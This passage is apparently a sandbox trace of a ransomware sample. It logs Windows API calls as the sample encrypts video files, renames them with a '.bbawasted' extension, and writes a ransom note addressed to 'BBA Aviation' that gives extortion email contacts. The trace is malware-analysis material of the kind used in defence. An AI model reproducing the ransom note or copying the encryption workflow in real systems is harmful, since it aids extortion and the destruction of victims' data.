(lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\Ebmho3M9UzB0A.mkv") returned 74 [0229.472] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x29e) returned 0x6bc8e0 [0229.472] lstrcpyW (in: lpString1=0x6bc974, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0229.472] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bdcf0 [0229.472] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6bd0) returned 1 [0229.473] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0xa3a, pbBuffer=0x6bdcf0 | out: pbBuffer=0x6bdcf0) returned 1 [0229.473] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0229.473] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\Ebmho3M9UzB0A.mkv.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\ebmho3m9uzb0a.mkv.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0229.474] WriteFile (in: hFile=0x27c, lpBuffer=0x6bdcf0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bdcf0*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0229.475] SetEndOfFile (hFile=0x27c) returned 1 [0229.476] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0229.476] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bdcf0 | out: hHeap=0x660000) returned 1 [0229.476] lstrcpyW (in: lpString1=0x6bc974, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0229.476] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\Ebmho3M9UzB0A.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\ebmho3m9uzb0a.mkv"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\Ebmho3M9UzB0A.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\ebmho3m9uzb0a.mkv.bbawasted")) returned 1 [0229.477] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\Ebmho3M9UzB0A.mkv.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\ebmho3m9uzb0a.mkv.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0229.477] CreateFileMappingW (hFile=0x294, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0229.477] GetFileSize (in: hFile=0x294, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x85eb [0229.477] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x85eb) returned 0x5f0000 [0229.477] CloseHandle (hObject=0x294) returned 1 [0229.479] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0229.668] CloseHandle (hObject=0x290) returned 1 [0229.668] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0229.668] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6708) returned 1 [0229.669] CryptGenRandom (in: hProv=0x6a6708, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0229.669] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0229.669] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6240) returned 1 [0229.670] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0229.670] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0229.681] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0229.681] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0229.681] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0229.681] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]eydExKbncIrUiHinrp5xHVLu11rjBCKJUEBXd8VivO4DYCR6ZCixLT+XXtaANddt\r\nCpt4oFIA5TCM8jpo7Ccs+dydSs9iFYu23iM46zG3h11YCIAYjGm4gjQ/1QD+4FyU\r\n2aFuJPvd3w6hf4Gh1rJaGRhHVllD41zKOtqLOvGut+L5QdnanuLCnHxtKdZptaki\r\nAHD9MlFYKsA0dBTS2G5G1ykHs4CAeoijY92UQynGWx96MUxuuZv2bHF9Nkrb4wZR\r\nflnUi+K+t/YwMZrDaKzDKOO7i8yoMgGzp/c1zFBzs9DBFUFg89H6iuXjLdDrfhA+\r\nm0lGgbRMcecrXPCQ/blIzljY3EqsyDp5EDvf2Z0T+ub22yx4fuq2hRBzhY3apMHG\r\nDoSzTWtJgSoW5/vzC0ky6Zh/yGhYwwgT/kJhdm5IjjlFC0IdCkTKZzK+pdTF4qL+\r\nQ4B83RtqS7wJ/Bwze4mGRiNXolUO6Hb+klYrVvY9OpRWX4RkaG47+DjXoYZJUeYT\r\nUMZAvsJMue3/oyaoxY+Z/sJ/qUjbjxhwn/g2qKCayrbMcwjwbFIMl3qomin5Y/vg\r\nmbeaBet4d679X5ZEfdEPNkrGtezgmv/znHMWdYqbOlaBPKZOex/UmUOU6xnR3NJ/\r\nBVRjWmBt7UPByiq1G4iooHkYF04PLwjYD+FoiUBE77h=[end_key]\r\nKEEP IT\r\n") returned 984 [0229.681] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0229.681] WriteFile (in: hFile=0x27c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0229.681] SetEndOfFile (hFile=0x27c) returned 1 [0229.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0229.903] CloseHandle (hObject=0x27c) returned 1 [0229.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0229.903] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6beaa8 | out: hHeap=0x660000) returned 1 [0229.904] _aulldvrm () returned 0x0 [0229.904] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a69b0) returned 1 [0229.904] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0229.904] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0229.904] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\CqIKnkIH.mp4") returned 75 [0229.904] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a0) returned 0x6bc8e0 [0229.905] lstrcpyW (in: lpString1=0x6bc976, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0229.905] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0229.905] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6460) returned 1 [0229.905] CryptGenRandom (in: hProv=0x6a6460, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0229.905] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0229.905] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\CqIKnkIH.mp4.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\cqiknkih.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0229.906] WriteFile (in: hFile=0x27c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0229.907] SetEndOfFile (hFile=0x27c) returned 1 [0229.907] SetFilePointer (in: hFile=0x27c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0229.907] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0229.907] lstrcpyW (in: lpString1=0x6bc976, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0229.907] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\CqIKnkIH.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\cqiknkih.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\CqIKnkIH.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\cqiknkih.mp4.bbawasted")) returned 1 [0229.909] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\CqIKnkIH.mp4.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\cqiknkih.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0229.909] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x294 [0229.909] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x806e [0229.910] MapViewOfFile (hFileMappingObject=0x294, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x806e) returned 0x5f0000 [0229.910] CloseHandle (hObject=0x290) returned 1 [0229.911] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0229.912] CloseHandle (hObject=0x294) returned 1 [0229.912] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x66dd58 [0229.912] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6680) returned 1 [0229.912] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x1b8, pbBuffer=0x66dda0 | out: pbBuffer=0x66dda0) returned 1 [0229.912] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0229.913] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6570) returned 1 [0229.913] CryptGenRandom (in: hProv=0x6a6570, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0229.913] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0229.923] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0229.923] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x66dd58 | out: hHeap=0x660000) returned 1 [0229.923] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0229.923] _snwprintf (in: _Dest=0x6bff48, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]rEWO1T2UHAIB+Lw7Ij2ghEVi+v1v+oScKLSvS2uBnOTDpunVfGTAELWfXQOkBKaK\r\nfOngxNcSoSskAE+OUm97OCIEXEwh4aTwVLypUNQms3Ss+izTkDjdDJbj8pz7t/a0\r\nnLFIx6tahe/zkbE2gTgGHUTUppRlmXqhaHlkfw+716Qk30gz9KScwze+aKEy6WVy\r\nPtxOontWNt39Co/8MGvJgvs5E1CoC4l9yTeJn5mpd0UbFH3rYZq/GUU0bS2hbUNl\r\n+huCpem/BGYP6YBF28qaNY9pgarNBho94C9JRivBbDRnea56UX33V8Ct3pNOqMlC\r\nvEUbbe+4XI7/piWopRzV9r8DDm+S0q2iKNOgob88bjIaOU3H7u7hoaltdhc3NA8f\r\ngSGH/mTA3q3g8bZowVLhAUmuMW3J1+klt5UWF2o/gTkFwT63kd5xBf/TJ6C7sT6J\r\nIc1fPnZ+OxQKO1JlHqn+Pw6LDoVbTtMoN5ItHedSKjaYAcXjKNJ+xdoXzq4M6OxV\r\nwKEwCjGo7hq648f4+hNv4elBwQpbc1CuCUeTb/GX1gtSI4FY/13QFnYFvqAUA3m+\r\nRMWfSDx2dthkNIY49UbkdYG3b2sz3KHfsAAuBIPS+bfNQhuu30qx3vDS6HpJVH+o\r\nCZTDA3W3550DUPs3b2JSTQPpFFf92SZDyluuEd3P/1T=[end_key]\r\nKEEP IT\r\n") returned 984 [0229.923] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0229.923] WriteFile (in: hFile=0x27c, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0229.924] SetEndOfFile (hFile=0x27c) returned 1 [0229.927] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0229.927] CloseHandle (hObject=0x27c) returned 1 [0229.927] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0229.927] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b9ff0 | out: hHeap=0x660000) returned 1 [0229.928] _aulldvrm () returned 0x0 [0229.928] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a65f8) returned 1 [0229.928] CryptGenRandom (in: hProv=0x6a65f8, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0229.928] CryptReleaseContext (hProv=0x6a65f8, dwFlags=0x0) returned 1 [0229.929] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\Lo s0GYEgTtR.avi") returned 79 [0229.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2a8) returned 0x6bc8e0 [0229.929] lstrcpyW (in: lpString1=0x6bc97e, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0229.929] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bff48 [0229.929] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a6708) returned 1 [0229.930] CryptGenRandom (in: hProv=0x6a6708, dwLen=0xa3a, pbBuffer=0x6bff48 | out: pbBuffer=0x6bff48) returned 1 [0229.930] CryptReleaseContext (hProv=0x6a6708, dwFlags=0x0) returned 1 [0229.930] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\Lo s0GYEgTtR.avi.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\lo s0gyegttr.avi.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0230.089] WriteFile (in: hFile=0x294, lpBuffer=0x6bff48*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x147febc, lpOverlapped=0x0 | out: lpBuffer=0x6bff48*, lpNumberOfBytesWritten=0x147febc*=0xa3a, lpOverlapped=0x0) returned 1 [0230.090] SetEndOfFile (hFile=0x294) returned 1 [0230.090] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0230.090] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bff48 | out: hHeap=0x660000) returned 1 [0230.090] lstrcpyW (in: lpString1=0x6bc97e, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0230.091] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\Lo s0GYEgTtR.avi" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\lo s0gyegttr.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\Lo s0GYEgTtR.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\lo s0gyegttr.avi.bbawasted")) returned 1 [0230.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\Lo s0GYEgTtR.avi.bbawasted" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\lo s0gyegttr.avi.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0230.091] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x290 [0230.092] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x147fe8c | out: lpFileSizeHigh=0x147fe8c*=0x0) returned 0x16d65 [0230.092] MapViewOfFile (hFileMappingObject=0x290, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x16d65) returned 0x5f0000 [0230.092] CloseHandle (hObject=0x27c) returned 1 [0230.094] UnmapViewOfFile (lpBaseAddress=0x5f0000) returned 1 [0230.095] CloseHandle (hObject=0x290) returned 1 [0230.095] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0230.095] CryptAcquireContextW (in: phProv=0x147fe7c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fe7c*=0x6a6bd0) returned 1 [0230.096] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0230.096] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0230.096] CryptAcquireContextW (in: phProv=0x147fbe4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fbe4*=0x6a6680) returned 1 [0230.096] CryptGenRandom (in: hProv=0x6a6680, dwLen=0x200, pbBuffer=0x147fc00 | out: pbBuffer=0x147fc00) returned 1 [0230.096] CryptReleaseContext (hProv=0x6a6680, dwFlags=0x0) returned 1 [0230.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6c4b88 [0230.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0230.105] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.105] _snwprintf (in: _Dest=0x6b96f8, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]Tj4ZfqsQXiqaarsjM1Zj+asv2TrespTtdptQGDp026QmgTU1W9QDdDEkx4aeKZqH\r\nQI+cZnpyM58YWePNTZboCiNIcDGZXlzNdx9kI2JHEnvn71IEG2mzA5Gc5YNysQHc\r\nB5l9nBaEH8HPUuTxo+3m00uP+UjfPXYkhw++tNnJx+94k1rrChFSJsdxWmaj7RCU\r\nmgQ3ziY77/7QnDveC/btKvbzsjQc5p3CsLUvFUp+USEg6dTf2xA4ymeeP6uyZtFT\r\ngzN4J9UpVfQdN9LrxSPljbVUnMTmZ3I8/nSx4UhwzaCKJmLUBPP/2WjyIF6hGlUU\r\nhERekMneE8BYfx92+9Jse3Wh3QqoJjxfVtG0UBajkcX6E9wyaKxxEXhau/yvBWXK\r\n2kOA4bsB3ZPRtF7VgerhPG4DIVrIBWypO+X2YVK6MXhPEcapHHTEDPsh4DxjZbnU\r\njKQ+5ls3lOdtniDXLBU/QSI9k5fYYRbV4znyeJxg4YiNHxiKOTyKELiEdGbCxZVc\r\nCRr97wYTV/kNNNELm6/21fN7nKc0I8d2elON6xY/d8B+gZMBONPcBZ2bdYDEWlXR\r\noYevwGPPE7a7HXDPeeM7fzax/CRl7jNSEWH1HM1T3xlWTrd92tpvv16aAOHmh4K2\r\nVvGLbPq5qqp6O6+1tFfIEmp6ZpdYHPqg4Lvi2MXXTPP=[end_key]\r\nKEEP IT\r\n") returned 984 [0230.105] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6c4b88 | out: hHeap=0x660000) returned 1 [0230.105] WriteFile (in: hFile=0x294, lpBuffer=0x6b96f8*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x147fef0, lpOverlapped=0x0 | out: lpBuffer=0x6b96f8*, lpNumberOfBytesWritten=0x147fef0*=0x7b0, lpOverlapped=0x0) returned 1 [0230.105] SetEndOfFile (hFile=0x294) returned 1 [0230.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b96f8 | out: hHeap=0x660000) returned 1 [0230.108] CloseHandle (hObject=0x294) returned 1 [0230.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc8e0 | out: hHeap=0x660000) returned 1 [0230.108] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bc6f8 | out: hHeap=0x660000) returned 1 [0230.108] _aulldvrm () returned 0x0 [0230.108] CryptAcquireContextW (in: phProv=0x147fec4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fec4*=0x6a6ce0) returned 1 [0230.109] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x48, pbBuffer=0x147ff00 | out: pbBuffer=0x147ff00) returned 1 [0230.109] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0230.109] lstrlenW (lpString="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\ULeek VcwTN4NlzEzq.swf") returned 85 [0230.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2b4) returned 0x6c4b88 [0230.109] lstrcpyW (in: lpString1=0x6c4c32, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0230.109] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6b96f8 [0230.109] CryptAcquireContextW (in: phProv=0x147fea0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x147fea0*=0x6a63d8) returned 1 [0230.110] CryptGenRandom (in: hProv=0x6a63d8, dwLen=0xa3a, pbBuffer=0x6b96f8 | out: pbBuffer=0x6b96f8) returned 1 [0230.110] CryptReleaseContext (hProv=0x6a63d8, dwFlags=0x0) returned 1 [0230.110] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\DfSmckrGk\\0-dUp65UCjNI_AwNhc0\\uhS 1\\ULeek VcwTN4NlzEzq.swf.bbawasted_info" (normalized: "c:\\users\\fd1hvy\\videos\\dfsmckrgk\\0-dup65ucjni_awnhc0\\uhs 1\\uleek vcwtn4nlzezq.swf.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, 